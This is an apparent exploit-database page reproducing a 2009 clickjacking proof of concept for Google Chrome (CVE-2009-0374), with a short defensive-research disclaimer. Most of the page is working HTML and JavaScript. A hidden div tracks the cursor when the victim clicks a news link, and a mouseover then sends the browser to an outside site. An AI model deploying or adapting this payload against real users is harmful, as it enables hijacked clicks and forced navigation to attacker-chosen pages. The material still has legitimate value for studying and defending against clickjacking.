Materialized exploit
CVE-2009-0374
1 public exploit(s) for this CVE, 1 materialized with their code.
For defensive research only. Only test on systems you own or have written authorization for. Unauthorized access is illegal.
ExploitDB
remote windows Verified
Source
Google Chrome 1.0.154.43 - Clickjacking
By x0x
How to test this exploit
Remote exploit. Target an isolated vulnerable instance (VM/lab), never a production system.
Code html
#############################################################
# Application Name : Google Chrome Web Browser
# Vulnerable Type : Clickjacking
# Home : www.ozkanbozkurt.com
# Author : x0x
#############################################################
< ------------------- header data end of ------------------- >
<html>
<style type="text/css">
<!--
.style1 {
font-size: 50px;
font-weight: bold;
}
.style2 {
color: #FF0000;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/BARCOD3';">This</div>
<p><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
Greetz : All CW Users | All Muslims and Only Brother me Septemb0x
# milw0rm.com [2009-01-28]